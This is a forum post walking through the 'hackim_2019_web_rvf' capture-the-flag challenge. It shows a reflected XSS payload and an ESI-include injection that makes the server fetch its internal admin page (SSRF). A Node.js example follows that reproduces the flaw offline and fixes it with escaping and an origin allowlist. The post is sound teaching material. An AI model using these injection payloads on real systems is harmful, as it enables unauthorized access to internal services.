roger posted on 2020-4-21 17:57:42

hackim_2019_web_rvf

On entering the challenge there is an input box.

There is also an admin page.

After submitting input, the URL becomes:
/edge?title=123&description=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E and this triggers XSS, so the description is reflected into the page unescaped.
Trying /edge?title=123&description=1 instead triggers an error, and the error output reveals that the backend uses the esi.js library. Its official example reads:

> You want to embed the fragment of HTML from “(http://snipets.com/abc.html)“ within an HTML document.
>
> ```
> blah blah, oh and here i embed in the page a snipet using an ESI server ...
> <esi:include src="http://snipets.com/snipet.html"></esi:include>
> ```
>
> **snipet.html**
>
> ```
> <b>Snipet</b>
> ```
>
> With Node ESI script, you can pre-process ESI tags.

Since the description is reflected unescaped and then processed as ESI, we can infer that the intended path is SSRF through an injected `<esi:include>` tag. Construct:

/edge?title=123&description=<esi:include src="http://127.0.0.1:8080"></esi:include>

This successfully returns the content of the page, fetched by the server itself. Pointing the include at the admin page gives the flag:

http://192.168.241.137:8080/edge?title=123&description=<esi:include src="http://192.168.241.137:8080/admin"></esi:include>
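As an added example (not the challenge's source and not the esi.js library itself), the following Node.js snippet reimplements just the `<esi:include>` substitution step to show why reflecting user input into an ESI-processed template is an SSRF, and two ways to close it: HTML-escaping the input before it reaches the template, and allowlisting the origins an include may fetch from. The "network" is a constructed in-memory map with a made-up flag, so the example runs offline; `renderEdgeVulnerable`, `renderEdgeFixed` and `allowlistedFetcher` are hypothetical names, not the challenge's handlers.

```javascript
// Added example, not the challenge's source or the esi.js library: a minimal
// ESI <esi:include> processor that shows why reflecting user input into an
// ESI-processed page is SSRF, and two ways to stop it.

// Constructed stand-in for what the backend can reach over the network
// (hypothetical URLs and a made-up flag, so the example runs offline).
const INTERNAL_NETWORK = {
  'http://127.0.0.1:8080/': '<html>edge index</html>',
  'http://127.0.0.1:8080/admin': 'flag{constructed-example-flag}',
  'http://snipets.com/snipet.html': '<b>Snipet</b>',
};

// Synchronous fetcher used in place of a real HTTP client; unknown URLs
// behave like a 404 and yield an empty fragment.
function fetchSync(url) {
  return Object.prototype.hasOwnProperty.call(INTERNAL_NETWORK, url)
    ? INTERNAL_NETWORK[url]
    : '';
}

// Matches <esi:include src="..."/> and <esi:include src="..."></esi:include>.
const ESI_INCLUDE = /<esi:include\s+src="([^"]*)"\s*(?:\/>|>\s*<\/esi:include>)/g;

// Core ESI step: every include tag is replaced by the fetched fragment.
// This is the behaviour that turns a tag injection into a server-side request.
function processEsi(html, fetcher) {
  return html.replace(ESI_INCLUDE, (_tag, src) => fetcher(src));
}

// Vulnerable /edge handler: title and description are interpolated raw into
// the template, and the template is then ESI-processed, so an attacker who
// submits an <esi:include> tag makes the server fetch an arbitrary URL.
function renderEdgeVulnerable(title, description, fetcher) {
  const template = `<h1>${title}</h1><p>${description}</p>`;
  return processEsi(template, fetcher);
}

// Fix 1: HTML-escape user input before it reaches the template, so it can
// form neither an <esi:include> tag (SSRF) nor an <img onerror> (XSS).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderEdgeFixed(title, description, fetcher) {
  const template = `<h1>${escapeHtml(title)}</h1><p>${escapeHtml(description)}</p>`;
  return processEsi(template, fetcher);
}

// Fix 2 (defence in depth): even legitimate includes should only be allowed
// to hit an allowlisted set of origins, never loopback or internal hosts.
function allowlistedFetcher(fetcher, allowedOrigins) {
  return (src) => {
    let origin;
    try {
      origin = new URL(src).origin;
    } catch (e) {
      return ''; // unparsable src: drop the fragment
    }
    return allowedOrigins.has(origin) ? fetcher(src) : '';
  };
}

// Usage: the payload from the writeup against each variant.
const payload = '<esi:include src="http://127.0.0.1:8080/admin"></esi:include>';
console.log(renderEdgeVulnerable('123', payload, fetchSync));
console.log(renderEdgeFixed('123', payload, fetchSync));
console.log(processEsi(payload, allowlistedFetcher(fetchSync, new Set(['http://snipets.com']))));
```

Escaping alone is the fix for the bug as the writeup describes it (the description is rendered into the template, not meant to carry ESI markup at all); the origin allowlist is the extra check worth keeping on any ESI gateway, because it also covers includes that come from trusted templates but reference attacker-influenced URLs.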


